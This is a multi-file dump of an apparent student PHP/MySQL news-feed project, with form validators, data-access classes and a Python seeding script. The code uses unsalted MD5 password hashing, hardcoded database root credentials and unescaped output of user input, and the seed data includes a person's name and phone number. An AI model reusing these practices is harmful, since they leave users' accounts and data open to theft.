$length){\n\n // assign the type\n $type = 'is_'.$type;\n \n if(!$type($string))\n\t {\n\t return FALSE;\n\t }\n // now we see if there is anything in the string\n elseif(empty($string))\n\t {\n\t return FALSE;\n\t }\n // then we check how long the string is\n elseif(strlen($string) > $length)\n\t {\n\t return FALSE;\n\t }\nelse\n {\n // if all is well, we return TRUE\n return TRUE;\n }\n }\n\n // check ALL the REQUEST variables\nfunction checkSet()\n{\n return isset($_REQUEST['userName'], $_REQUEST['userPassword'], $_REQUEST['userRepeatPass'], $_REQUEST['userEmail'], $_REQUEST['userCell'], $_REQUEST['userCarrier']);\n}\n\nfunction checkEmail($email)\n{\n return preg_match('/^\\S+@[\\w\\d.-]{2,}\\.[\\w]{2,6}$/iU', $email) ? TRUE : FALSE;\n}\n\n// check all our variables are set\nif(checkSet() != FALSE)\n {\n // Sanity check the username variable.\n\n if(empty($_REQUEST['userName'])==FALSE && sanityCheck($_REQUEST['userName'], 'string', 25) != FALSE)\n {\n $userName = $_REQUEST['userName'];\n }\n else\n {\n echo 'Username is not set';\n exit();\n }\n\n // *************** TODO **************\n // *Verify that username is available*\n // ***********************************\n\n // Validate the password input\n if(empty($_REQUEST['userPassword'])==FALSE && sanityCheck($_REQUEST['userPassword'], 'string', 10) != FALSE)\n {\n\tif (strlen($_REQUEST['userPassword']) < 6)\n\t {\n\t echo 'Please choose a password of at least 6 characters';\n\t exit();\n\t }\n\telse\n\t {\n\t $userPassword = $_REQUEST['userPassword'];\n\t }\n }\n else\n {\n echo 'Please enter a valid Password';\n exit();\n }\n\n // Make sure that the two password entries are identical\n if (empty($_REQUEST['userRepeatPass'])==FALSE && sanityCheck($_REQUEST['userRepeatPass'], 'string', 10) != FALSE)\n {\n\t$userRepeatPass = $_REQUEST['userRepeatPass'];\n\tif ($userPassword != $userRepeatPass)\n\t {\n\t echo 'Password mismatch. Please re-enter your password.';\n\t exit();\n\t }\n }\n else\n {\n\techo 'Please enter your password again in the Repeat Password field.';\n\texit();\n }\n\n // Make sure that the email is syntactically valid\n if (empty($_REQUEST['userEmail'])==FALSE && sanityCheck($_REQUEST['userEmail'], 'string', 50) != FALSE)\n {\n\tif (checkEmail($_REQUEST['userEmail']) == FALSE)\n\t {\n\t echo 'Please enter a valid email address.';\n\t exit();\n\t }\n\t else\n\t {\n\t $userEmail = $_REQUEST['userEmail'];\n\t }\n }\n else\n {\n\techo 'A valid email address is required to register with Watercooler.';\n\texit();\n }\n\n // Validate the user's cell phone number\n if (empty($_REQUEST['userCell'])==FALSE)\n {\n\tif (sanityCheck($_REQUEST['userCell'],'numeric', 10) != FALSE)\n\t {\n\t if (strlen($_REQUEST['userCell']) < 9)\n\t {\n\t\techo 'A valid cell phone number must be either nine or ten digits long';\n\t\texit();\n\t }\n\t else\n\t {\n\t\t$userCell = $_REQUEST['userCell'];\n\t }\n\t }\n\telse\n\t {\n\t echo 'Please enter a valid cell phone number (only numeric characters).';\n\t exit();\n\t }\n }\n elseif($_REQUEST['receive_sms_text'] == 'yes' || $_REQUEST['receive_sms_link'])\n {\n\t$userCell = $_REQUEST['userCell'];\n }\n else\n {\n\techo 'Please enter your cell phone number or deselect the SMS(text) and SMS(link) default methods of reception.';\n\texit();\n }\n\n }\n else\n {\n // this will be the default message if the form accessed without POSTing\n echo '<p>Please fill in the form above</p>';\n }\n\n?>\n" }, { "alpha_fraction": 0.5660377144813538, "alphanum_fraction": 0.5660377144813538, "avg_line_length": 34.33333206176758, "blob_id": "2d72909e4e60dbc47fcff52d29e7f981f6222e33", "content_id": "4ecd50e99a21677cd77d47c99b61a549632c1e06", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 106, "license_type": "no_license", "max_line_length": 98, "num_lines": 3, "path": "/www/trunk/common.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\n\n$page_uri_base = 'http://'.$_SERVER['HTTP_HOST'].rtrim(dirname($_SERVER['SCRIPT_NAME']), '/').'/';\n" }, { "alpha_fraction": 0.571650505065918, "alphanum_fraction": 0.5829126238822937, "avg_line_length": 30.75308609008789, "blob_id": "ecd35f6bb3d58bf055c058684876027d67aa53ea", "content_id": "f1d71ce2df4d28904f0afda79f72c8394707c763", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 2575, "license_type": "no_license", "max_line_length": 102, "num_lines": 81, "path": "/www/trunk/homepage.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\"\n\t \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">\n<html lang=\"EN\" dir=\"ltr\" xmlns=\"http://www.w3.org/1999/xhtml\">\n <head>\n <meta http-equiv=\"content-type\" content=\"text/xml; charset=utf-8\" />\n <title><?php echo $user->username; ?>'s homepage</title><!-- ' -->\n <link rel=\"stylesheet\" href=\"watercooler.css\" title=\"watercooler\" />\n <script src=\"http://www.google.com/jsapi\"></script>\n <script>google.load(\"jquery\", \"1\");</script>\n </head>\n <body>\n <div id=\"wrap\">\n <div id=\"header\">\n\t<a href=\"logout.php\" style=\"float:left; position:absolute; text-align:left;\">logout</a>\n\t<div id=\"logo\">\n <a href=\"index.php\"><img src=\"watercooler_logo.png\" alt=\"Welcome to the Watercooler\" /></a>\n\t</div>\n </div>\n <div style=\"border-style:none;\" class=\"center\">\n <div id=\"feedreader\">\n\t <div id=\"nav\">\n\t <h1 class=\"title\">\n\t <?php echo $user->username; ?>'s Latest News <!-- ' -->\n\t </h1>\n\t </div>\n\t <div id=\"feedreader_feeds\">\n <?php include('getFeeds.php'); ?>\n\t </div>\n\t <div id=\"feedreader_stories\">\n </div>\n\t</div>\n\t<div id=\"userspace\">\n\t <div id=\"browse\">\n\t <h1 class=\"title\">Browse Feeds</h1>\n\t </div>\n\t <div id=\"feedBrowser\">\n\t <div id=\"feedHeader\" style=\"margin:1em 1em 0 0; border-bottom: 2px solid navy;\">\n\t <div style=\"width:12em;text-align:left; float:left;\">Title</div>\n\t <div style=\"width:3.5em; text-align:right; float:right; margin-right:1em;\">Users</div>\n\t </div>\n\t <div id=\"feedRows\">\n\t <?php include('feedBrowser.php') ?>\n\t </div>\n </div>\n\t</div>\n\t<div id=\"footer\">\n\t <a href=\"settings.php\"><button type=\"button\" class=\"left bigButton\">Settings</button></a>\n\t <a href=\"unsubscribe.php\"><button type=\"button\" class=\"right bigButton\">Delete Account</button></a>\n\t</div>\n </div>\n </div>\n\n <script type=\"text/javascript\">\n function getFeeds() {\n // get reader element\n reader = $('#feedreader_feeds');\n\n // set up and execute the request\n reader.load('getFeeds.php');\n }\n\n function getStories(feedId) {\n // get reader element\n\treader = $('#feedreader_stories');\n\t// notify user that data is being fetched\n\treader.html('<h1>Fetching stories...</h1>');\n \n\t// set up and execute the request\n\treader.load('getStories.php',{id:feedId});\n }\n\n function addFeed(feedId) {\n\t$.post('addFeed.php', {id:feedId},\n\t function(data) {\n\t\t getFeeds();\n\t }, 'text');\n }\n </script>\n \n </body>\n</html> \n" }, { "alpha_fraction": 0.5822737216949463, "alphanum_fraction": 0.585639476776123, "avg_line_length": 27.91351318359375, "blob_id": "830438803b5e2f6cfd88247d4bc97cfe729dcdd7", "content_id": "d69c684a465b5fb630838ea9046dff74b7246c14", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 5348, "license_type": "no_license", "max_line_length": 328, "num_lines": 185, "path": "/www/trunk/verifySettings.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\n\n /**\n * This function can be used to check the sanity of variables\n * @param string $type The type of variable can be bool, float, numeric, string, array, or object\n * @param string $string The variable name you would like to check\n * @param string $length The maximum length of the variable\n *\n * return bool\n */\n function sanityCheck($string, $type, $length){\n \n // assign the type\n $type = 'is_'.$type;\n \n if(!$type($string))\n {\n return FALSE;\n }\n // now we see if there is anything in the string\n elseif(empty($string))\n {\n return FALSE;\n }\n // then we check how long the string is\n elseif(strlen($string) > $length)\n {\n return FALSE;\n }\n else\n {\n // if all is well, we return TRUE\n return TRUE;\n }\n}\n\n// check ALL the REQUEST variables\nfunction checkSet()\n{\n return (isset($_REQUEST['userName']) || isset($_REQUEST['userRepeatPass']) || isset($_REQUEST['userEmail']) || isset($_REQUEST['userCell']) || isset($_REQUEST['userCarrier']) || isset($_REQUEST['userFeeds']) || isset($_REQUEST['receive_email']) || isset($_REQUEST['receive_sms_text']) || isset($_REQUEST['receive_sms_link']));\n}\n\nfunction checkEmail($email)\n{\n return preg_match('/^\\S+@[\\w\\d.-]{2,}\\.[\\w]{2,6}$/iU', $email) ? TRUE : FALSE;\n}\n\n$prompt = TRUE;\n\nif(checkset())\n {\n if(empty($_REQUEST['userNewPass'])==FALSE && sanityCheck($_REQUEST['userNewPass'], 'string', 10) != FALSE)\n {\n\tif (strlen($_REQUEST['userNewPass']) < 6)\n\t {\n\t echo '<p style=\"color:red\">Please choose a password of at least 6 characters</p>';\n\t $_REQUEST['userNewPass'] = '';\n\t exit();\n\t }\n\t\n\t// Make sure that the two password entries are identical\n\tif (empty($_REQUEST['userRepeatNewPass'])==FALSE && sanityCheck($_REQUEST['userRepeatNewPass'], 'string', 10) != FALSE)\n\t {\n\t $userRepeatNewPass = $_REQUEST['userRepeatNewPass'];\n\t if ($userRepeatNewPass != $_REQUEST['userNewPass'])\n\t {\n\t\techo '<p style=\"color:red\">Password mismatch. Please re-enter your password.</p>';\n\t\texit();\n\t }\n\t }\n\telse\n\t {\n\t echo '<p style=\"color:red\">Please enter your password again in the Repeat Password field.</p>';\n\t exit();\n\t }\n\t$user->password = md5($_REQUEST['userNewPass']);\n\t$prompt = FALSE;\n }\n \n \n // Sanity check the username variable.\n \n if(empty($_REQUEST['userName'])==FALSE && sanityCheck($_REQUEST['userName'], 'string', 25) != FALSE)\n {\n\tif(User::find('username',$_REQUEST['userName']) != NULL)\n\t {\n\t if($_REQUEST['userName'] != $user->username)\n\t {\n\t\techo '<p style=\"color:red\">Username is already in use. Please try another username.</p>';\n\t\texit();\n\t }\n\t \n\t }\n\telse\n\t {\n\t $user->username = $_REQUEST['userName'];\n\t echo \"<p style=\\\"color:navy\\\">Username successfully updated to {$user->username}</p>\";\n\t $prompt = FALSE;\n\t }\n }\n \n \n // Make sure that the email is syntactically valid\n if (empty($_REQUEST['userEmail'])==FALSE && sanityCheck($_REQUEST['userEmail'], 'string', 50) != FALSE)\n {\n\tif (checkEmail($_REQUEST['userEmail']) == FALSE)\n\t {\n\t echo '<p style=\"color:red\">Please enter a valid email address.</p>';\n\t exit();\n\t }\n\telse\n\t {\n\t if ($user->email != $_REQUEST['userEmail'])\n\t {\n\t\t$user->email = $_REQUEST['userEmail'];\n\t\techo \"<p style=\\\"color:navy\\\">Email address successfully updated to {$user->email} </p>\";\n\t\t$prompt = FALSE;\n\t }\n\t }\n }\n \n // Validate the user's cell phone number\n if (empty($_REQUEST['userCell'])==FALSE)\n {\n\tif (sanityCheck($_REQUEST['userCell'],'numeric', 10) != FALSE)\n\t {\n\t if (strlen($_REQUEST['userCell']) != 10)\n\t {\n\t\techo '<p style=\"color:red\">A valid cell phone number must be exactly ten digits long</p>';\n\t\t$_REQUEST['userCell'] = '';\n\t\texit();\n\t }\n\t else\n\t {\n\t\tif(($this_user_object = User::find('phone_number',$_REQUEST['userCell'])) != NULL)\n\t\t {\n\t\t if ($this_user_object != $user)\n\t\t {\n\t\t\techo '<p style=\"color:red\">There is already an account associated with this cell phone number. If you do not have an account with username ';\n\t\t\t$this_user_array = $this_user_object->get((array)'username');\n\t\t\techo $this_user_array['username'];\n\t\t\techo ', email our <a href\"mailto:[email protected]\">Customer Service Department</a>.</p>';\n\t\t\texit();\n\t\t }\n\t\t }\n\t\t$user->phone_number = $_REQUEST['userCell'];\n\t\t$prompt = FALSE;\n\t }\n\t }\n\telse\n\t {\n\t echo '<p style=\"color:red\">Please enter a valid cell phone number (only numeric characters).</p>';\n\t $_REQUEST['userCell'] = '';\n\t exit();\n\t }\n }\n \n $user->send_email = $_REQUEST['receive_email']=='yes';\n $user->send_sms_text = $_REQUEST['receive_sms_text']=='yes';\n $user->send_sms_link = $_REQUEST['receive_sms_link']=='yes';\n \n $feedinfos = array();\n if($_REQUEST['feed'] != NULL)\n {\n\tforeach($_REQUEST['feed'] as $index=>$currentFeed)\n\t {\n\t if (!empty($currentFeed))\n\t $feedinfos[] = array('url'=>$currentFeed, 'name'=>$currentFeed);\n\t }\n\t$prompt = FALSE;\n }\n $user->feeds = Feeds::create($feedinfos);\n \n if ($prompt == FALSE)\n {\n\tprint('<p style=\"color:navy;\">Update Successful.</p>');\n\tprint('<a href=\"index.php\">Here is your homepage!</a>');\n\tprint('</br></br>');\n }\n }\nelse\n {\n echo '<p style=\"color:navy;\">Edit your user information here.</p>';\n }\n?>" }, { "alpha_fraction": 0.6226624846458435, "alphanum_fraction": 0.6236643195152283, "avg_line_length": 31.089284896850586, "blob_id": "bb54cc9c2b53df6636e0f3c76705e63641fb7069", "content_id": "fc50f6f3b2c5a49dbb1bf0fd5e9e38604ccb2c1e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 8984, "license_type": "no_license", "max_line_length": 79, "num_lines": 280, "path": "/www/trunk/db_mysql_stories.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\nrequire_once('db.php');\nrequire_once('db_mysql.php');\n\n/* class MySQLStories implements iStories on MySQL databases (see corresponding\n documentation)\n*/\nclass MySQLStories extends MySQLDBObject implements iStories {\n private $db;\n public $stories;\n public $sort_sql = '';\n\n public function __construct(array $stories, MySQLDB $db) {\n $this->stories = $stories;\n $this->db = $db;\n }\n\n/* MySQLStories::get implements iStories::get (see corresponding documentation)\n*/\n public function get(array $storyattrs, $sortattr = NULL, \n\t\t $sortreverse = FALSE) {\n // XXX implement 'category' and 'feed' attributes\n\n if (count($this->stories) == 0)\n return array();\n\n if ($sortattr !== NULL)\n $sort_sql = self::get_sort_sql($sortattr, $sortreverse);\n else\n $sort_sql = $this->sort_sql;\n\n $get_result = array();\n\n // build SQL query\n $get_sql = 'SELECT ';\n // add column names\n foreach ($storyattrs as $key=>$attr) {\n if (isset(self::$storyattrs_to_cols[$attr])) {\n\t$get_sql .= self::$storyattrs_to_cols[$attr].\" AS $attr, \";\n\t$sql_added = TRUE;\n }\n }\n // remove trailing comma and space\n $get_sql = substr($get_sql, 0, -2);\n // add rest of SQL query\n $get_sql .= ' FROM feed_stories WHERE fid IN (';\n // add story ids\n for ($i = 0; $i < count($this->stories); $i++)\n $get_sql .= '?, ';\n // remove trailing comma and space\n $get_sql = substr($get_sql, 0, -2);\n // add rest of SQL query\n $get_sql .= \") $sort_sql;\";\n\n if ($sql_added === TRUE) {\n $get_stmt = $this->db->pdo->prepare($get_sql);\n // build an array of story ids\n foreach ($this as $story)\n\t$ids[] = $story->id;\n $get_stmt->execute($ids);\n $get_result = $get_stmt->fetchAll();\n if ($get_result === FALSE)\n\tthrow new Exception('PDOStatement::fetchAll failed');\n }\n\n return $get_result;\n }\n\n private static function get_sort_sql($storyattr, $reverse = FALSE) {\n // $forward_dir is the forward sort direction\n static $forward_dir = 'ASC';\n // $reverse_dir is the reversed sort direction\n static $reverse_dir = 'DESC';\n /* setting an attribute as a key to $storyattr_reversed indicates that it\n should be sorted the reverse direction by default */\n static $storyattr_reversed =\n array('timestamp'=>TRUE);\n\n // validate parameters\n if (!is_bool($reverse))\n throw new InvalidArgumentException('parameter $reverse must be a '.\n\t\t\t\t\t 'boolean');\n if (!isset(self::$storyattrs_to_cols[$storyattr]))\n throw new InvalidArgumentException('parameter $storyattr is not a '.\n\t\t\t\t\t 'valid attribute');\n\n // convert story attribute to database column\n $col = self::$storyattrs_to_cols[$storyattr];\n\n // calculate which direction to sort\n if ($reverse) {\n if (isset($storyattr_reversed[$storyattr]))\n\t$dir = $forward_dir;\n else\n\t$dir = $reverse_dir;\n } else {\n if (isset($storyattr_reversed[$storyattr]))\n\t$dir = $reverse_dir;\n else\n\t$dir = $forward_dir;\n }\n\n return \"ORDER BY $col $dir\";\n }\t \n/* MySQLStories::sort implements iStories::sort (see corresponding \n documentation)\n*/\n public function sort($storyattr, $reverse = FALSE) {\n $this->sort_sql = self::get_sort_sql($storyattr, $reverse);\n }\n \n // these functions implement Iterator\n public function rewind() {\n reset($this->stories);\n }\n public function current() {\n return current($this->stories);\n }\n public function key() {\n return key($this->stories);\n }\n public function next() {\n return next($this->stories);\n }\n public function valid() {\n return ($this->current() !== FALSE);\n }\n}\n\n/* class MySQLStory implements iStory on MySQL databases (see corresponding \n documentation)\n*/\nclass MySQLStory extends MySQLDBObject implements iStory {\n private $db;\n /* $fid is the unique feed story identifier which is used to access feed \n story information in the database */\n public $fid;\n\n static $feed_attr = 'feed';\n static $category_attr = 'category';\n\n /* function MySQLStory::__construct is the constructor for the class\n\n $db: (MySQLDB object) a valid MySQLDB object connected to the MySQL\n database to use\n */\n public function __construct(MySQLDB $db) {\n $this->db = $db;\n }\n\n /* function MySQLStory::__get is the PHP magic 'get' function for the \n class */\n public function __get($name) {\n $ret = $this->get(array($name));\n if ($ret === NULL || !isset($ret[$name]))\n return NULL;\n else\n return $ret[$name];\n }\n\n /* parseStoryInfo transforms a $storyinfo array, in the format taken by many\n iStory functions, into an associative array with keys as database column\n names\n */\n private static function parseStoryInfo(array $storyinfo, MySQLDB $db) {\n // rename the storyinfo keys as database column names\n foreach ($storyinfo as $key=>$value)\n if (self::$storyattrs_to_cols[$key] !== NULL)\n\t$db_storyinfo[self::$storyattrs_to_cols[$key]] = $value;\n\n return $db_storyinfo;\n }\n\n/* MySQLStory::find implements iStory::find (see corresponding documentation)\n*/\n public static function find($attr, $value, iDatabase $db = NULL) {\n if ($db === NULL)\n $db = self::$site_db;\n return self::__find($attr, $value, $db);\n }\n\n /* MySQLStory::__find is a helper function to MySQLStory::find which performs\n the actual find operation. This function was added in order to use\n typehinting on parameter $db.\n */\n private static function __find($attr, $value, MySQLDB $db) {\n // XXX do this in a more general way\n if ($attr !== 'fid')\n throw new InvalidArgumentException('parameter $attr must be a unique '.\n\t\t\t\t\t 'feed story attribute');\n \n $db_storyinfo = self::parseStoryInfo(array($attr=>$value), $db);\n\n $db_attr = key($db_storyinfo);\n $db_value = current($db_storyinfo);\n\n $find_sql = \"SELECT fid FROM feed_stories WHERE $db_attr=:value;\";\n $find_stmt = $db->pdo->prepare($find_sql);\n $find_stmt->bindParam(':value', $db_value);\n $find_stmt->execute();\n // set fetch mode to create an instance of this class\n $find_stmt->setFetchMode(PDO::FETCH_CLASS, __CLASS__, array('db'=>$db));\n $find_result = $find_stmt->fetch();\n return $find_result !== FALSE ? $find_result : NULL;\n }\n\n /* MySQLStory::getFeed is a written as a helper function to MySQLStory::get\n which carries out the operation of getting a story's feed source\n\n returns a MySQLFeed object representing story's feed source\n */\n private function getFeed() {\n static $feed_sql = 'SELECT sid FROM feed_sources WHERE \n sid=(SELECT sid FROM feed_stories WHERE fid=:fid);';\n $feed_stmt = $this->db->pdo->prepare($feed_sql);\n $feed_stmt->bindParam(':fid', $this->fid);\n $feed_stmt->execute();\n $feed_stmt->setFetchMode(PDO::FETCH_CLASS, 'MySQLFeed', \n\t\t\t array('db'=>$this->db));\n $feed_result = $feed_stmt->fetch();\n return $feed_result === FALSE ? NULL : $feed_result;\n }\n\n/* MySQLStory::get implements iStory::get (see corresponding documentation)\n*/\n public function get(array $storyattrs) {\n /* $valid_storyattrs is a list of attributes from $storyattrs which can be\n handled by the simple sql query generator below. Keep this list updated\n with MySQLDBObject::$storyattrs_to_cols.\n */\n static $valid_storyattrs = \n array('title'=>TRUE, 'content'=>TRUE, 'url'=>TRUE, 'timestamp'=>TRUE);\n static $category_sql = '(SELECT category FROM feed_categories WHERE \n gid=(SELECT gid FROM feed_stories \n WHERE fid=:fid3))';\n\n $sql_added = FALSE;\n $get_result = array();\n\n // build SQL query to use to get story attributes\n $get_sql = 'SELECT ';\n // add column names\n foreach ($storyattrs as $key=>$attr) {\n if (isset($valid_storyattrs[$attr])) {\n\t$get_sql .= self::$storyattrs_to_cols[$attr].\" AS $attr, \";\n\t$sql_added = TRUE;\n } else if ($attr === self::$category_attr) {\n\t$get_sql .= \"$category_sql AS $attr, \";\n\t$sql_added = TRUE;\n }\n }\n // remove trailing comma and space\n $get_sql = substr($get_sql, 0, -2);\n // add rest of SQL query\n $get_sql .= ' FROM feed_stories WHERE fid=:fid;';\n\n // do not attempt the SELECT if no attrs were added to the select\n if ($sql_added === TRUE) {\n $get_stmt = $this->db->pdo->prepare($get_sql);\n $get_stmt->bindParam(':fid', $this->fid);\n\n $get_stmt->execute();\n $get_result = $get_stmt->fetch(PDO::FETCH_ASSOC);\n if ($get_result === FALSE)\n\tthrow new Exception('PDOStatement::fetch failed');\n }\n\n // get id if requested\n if (in_array('id', $storyattrs))\n $get_result['id'] = $this->fid;\n if (in_array('fid', $storyattrs))\n $get_result['fid'] = $this->fid;\n\n // get feed source if requested\n if (in_array(self::$feed_attr, $storyattrs))\n $get_result[self::$feed_attr] = $this->getFeed();\n\n return $get_result;\n }\n}" }, { "alpha_fraction": 0.5535477995872498, "alphanum_fraction": 0.5747025012969971, "avg_line_length": 27.08974266052246, "blob_id": "f9641cc9dffee1942ef7e17618c93ad6d0f8fe31", "content_id": "84b1e0e28420339ae1fbf6ec208e06c50b1fd82b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2269, "license_type": "no_license", "max_line_length": 337, "num_lines": 78, "path": "/email_testing_insDefault.py", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.6\r\n\r\nimport sys\r\nimport MySQLdb\r\n\r\nconn = MySQLdb.connect (host = \"localhost\",\r\n user = \"root\",\r\n passwd = \"adminsql\",\r\n db = \"watercooler\")\r\ncursor = conn.cursor ()\r\n\r\nusers_table = [(\"lcdefault\", \"lcpassword\", \"simon\", \"tang\", \"650-804-0503\", \"[email protected]\", 0, 0, 1)]\r\n\r\nreceptions_table = [(1, 1)]\r\n\r\nreception_table = [(\"email\"),\r\n\t\t (\"sms_text\"),\r\n\t\t (\"sms_link\")]\r\n\r\ncarrior_table = [(\"AT&T\"),\r\n\t\t (\"T-Mobile\"),\r\n\t\t (\"Verizon\"),\r\n\t\t (\"Sprint\")]\r\n\r\nfavorites_table = [(1, 1, 1)]\r\n\r\nsources_table = [(\"espn\", \"http://sports.espn.go.com/espn/rss/news\")]\r\n\r\nfeeds_table = [(\"2010 NBA Playoffs: LeBron James confident Cleveland Cavaliers can come back against Boston Celtics\", \"LeBron James isn't listening to the nationwide criticism of his listless Game 5 performance against Boston.\", \"http://sports.espn.go.com/nba/playoffs/2010/news/story?id=5183847&campaign=rss&source=ESPNHeadlines\", 1273684800, 1, 1)\r\n]\r\n\r\ncategory_table = [(\"top_story\"),\r\n\t\t (\"highest_rated\"),\r\n\t\t (\"most_viewed\")]\r\n\r\ncursor.executemany (\"\"\"\r\n\t\t INSERT INTO users (username, password, first_name, last_name, phone_number, email, email_status, phone_status, cid)\r\n\t\t VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s)\r\n\t\t \"\"\", users_table)\r\n\r\ncursor.executemany (\"\"\"\r\n\t\t INSERT INTO receptions (uid, rid)\r\n\t\t VALUES (%s, %s)\r\n\t\t \"\"\", receptions_table)\r\n\r\ncursor.executemany (\"\"\"\r\n\t\t INSERT INTO reception_methods (method_type)\r\n\t\t VALUES (%s)\r\n\t\t \"\"\", reception_table)\r\n\r\ncursor.executemany (\"\"\"\r\n\t\t INSERT INTO carriors (carrior_name)\r\n\t\t VALUES (%s)\r\n\t\t \"\"\", carrior_table)\r\n\r\ncursor.executemany (\"\"\"\r\n\t\t INSERT INTO favorites (uid, sid, priority)\r\n\t\t VALUES (%s, %s, %s)\r\n\t\t \"\"\", favorites_table)\r\n\r\ncursor.executemany (\"\"\"\r\n\t\t INSERT INTO feed_sources (source_name, source_url)\r\n\t\t VALUES (%s, %s)\r\n\t\t \"\"\", sources_table)\r\n\r\ncursor.executemany (\"\"\"\r\n\t\t INSERT INTO feed_stories (title, content, url, time_stamp, sid, gid)\r\n\t\t VALUES (%s, %s, %s, %s, %s, %s)\r\n\t\t \"\"\", feeds_table)\r\n\r\ncursor.executemany (\"\"\"\r\n\t\t INSERT INTO feed_categories (category)\r\n\t\t VALUES (%s)\r\n\t\t \"\"\", category_table)\r\n\r\ncursor.close ()\r\nconn.commit ()\r\nconn.close ()\r\n" }, { "alpha_fraction": 0.6400580406188965, "alphanum_fraction": 0.6502177119255066, "avg_line_length": 40.75757598876953, "blob_id": "51a3ce68799fa42cc8e646deffa35fea88502ac0", "content_id": "2d20f6ecfb6743cbe723750e5e94b9b92bd0ac8e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 1378, "license_type": "no_license", "max_line_length": 143, "num_lines": 33, "path": "/www/trunk/confirm.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\n\nrequire_once('db_init.php');\n\nif (isset($_REQUEST['id']) && isset($_REQUEST['pin']))\n if (($user = User::find('id', $_REQUEST['id'])) !== NULL\n && $user->email_pin === $_REQUEST['pin'])\n $user->email_confirmed = TRUE;\n\n?>\n\n<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\"\n\t \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">\n<html lang=\"EN\" dir=\"ltr\" xmlns=\"http://www.w3.org/1999/xhtml\">\n <head>\n <link rel=\"SHORTCUT ICON\" href=\"http://geogriffin.mine.nu/watercooler/matt/watercooler-content-distribution/favicon.ico\" />\n <meta http-equiv=\"content-type\" content=\"text/xml; charset=utf-8\" />\n <title>Welcome to the Watercooler!</title>\n <link rel=\"stylesheet\" title=\"watercooler\" href=\"watercooler.css\" type=\"text/css\"/>\n </head>\n <body>\n <div id=\"wrap\">\n <div id=\"logo\">\n\t<a href=\"index.php\"><img src=\"watercooler_logo.png\" alt=\"Welcome to the Watercooler\" /></a>\n <div id=\"logo\">\n <fieldset style=\"width:22em;\"><legend>Successl</legend>\n <p style=\"color:navy;\">Your account has been confirmed. Click on the Watercooler logo to bring up the login page.</p>\n <p style=\"color:navy;\">Note that you will not receive any text messages until you have confirmed your phone number via the settings page.</p>\n\t<p><a href=\"index.php\">Return to the Watercooler homepage</a></p>\n </fieldset>\n </div>\n </body>\n</html>\n" }, { "alpha_fraction": 0.6430349946022034, "alphanum_fraction": 0.6438367962837219, "avg_line_length": 35.178627014160156, "blob_id": "eb085d49375dae0d1e7cc794047b41fd5c4dcb90", "content_id": "449b4666450665a885b3b17a2ae202fde6647cb5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 23697, "license_type": "no_license", "max_line_length": 79, "num_lines": 655, "path": "/www/trunk/db_mysql_users.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\nrequire_once('db.php');\nrequire_once('db_mysql.php');\nrequire_once('db_mysql_feeds.php');\n\n/* class MySQLUsers implements iUsers on MySQL databases (see corresponding \n documentation)\n*/\nclass MySQLUsers extends MySQLDBObject implements iUsers {\n /* $db is the database which contains this user */\n private $db;\n /* $users is an array of MySQLUser objects which represent the users in this\n set */\n // XXX there may be a better way to do this\n public $users;\n\n /* $carrier_attr is the attribute name which corrosponds to carrier */\n static $carrier_attr = 'carrier';\n\n /* function MySQLUsers::__construct is the constructor for the class\n\n $db: (MySQLDB) a valid MySQLDB object connected to the MySQL\n database to use\n */\n private function __construct(array $users, MySQLDB $db) {\n $this->users = $users;\n $this->db = $db;\n }\n\n /* MySQLUsers::__search is a helper function to MySQLUsers::searchAll and\n MySQLUsers::searchAny which performs the actual search operations\n\n $userinfo: (array) user information to search by, encoded in key-value\n pairs as described for the $userinfo parameter in iUser::set\n $op: (string) the MySQL operator to use in between each search term \n (e.g. 'OR' or 'AND')\n $db: (MySQLDB) a valid MySQLDB object connected to the MySQL database to\n use\n\n returns a MySQLUsers object representing the matched group of users\n */\n private static function __search(array $userinfo, $op, MySQLDB $db) {\n // build SQL query to use to search for users\n $search_sql = 'SELECT uid FROM users WHERE ';\n foreach ($userinfo as $attr=>$values) {\n foreach ((array) $values as $key=>$value) {\n\tif (isset(self::$userattrs_to_cols[$attr]))\n\t $search_sql .= \n\t self::$userattrs_to_cols[$attr].\"=? $op \";\n\telseif($attr === self::$carrier_attr)\n\t $search_sql .= \n\t \"cid=(SELECT cid FROM carriors WHERE carrior_name=?) $op \";\n }\n }\n // remove trailing op and spaces\n $search_sql = substr($search_sql, 0, -(strlen($op) + 2));\n // add rest of SQL query\n $search_sql .= ';';\n\n // prepare SQL statement\n $search_stmt = $db->pdo->prepare($search_sql);\n\n // create array of column value bindings\n foreach ($userinfo as $attr=>$values)\n foreach ((array) $values as $key=>$value)\n if (isset(self::$userattrs_to_cols[$attr])\n\t || $attr === self::$carrier_attr)\n\t $search_binds[] = $value;\n\n $search_stmt->execute($search_binds);\n // set fetch mode to create instances of MySQLUser\n $search_stmt->setFetchMode(PDO::FETCH_CLASS, 'MySQLUser', array($db));\n\n // fetch the result and create a new instance of this class\n $search_result = $search_stmt->fetchAll();\n if ($search_result !== FALSE) {\n $c = __CLASS__;\n return new $c($search_result, $db);\n } else\n return NULL;\n }\n\n/* MySQLUsers::searchAll implements iUsers::searchAll (see corresponding\n documentation)\n*/\n public static function 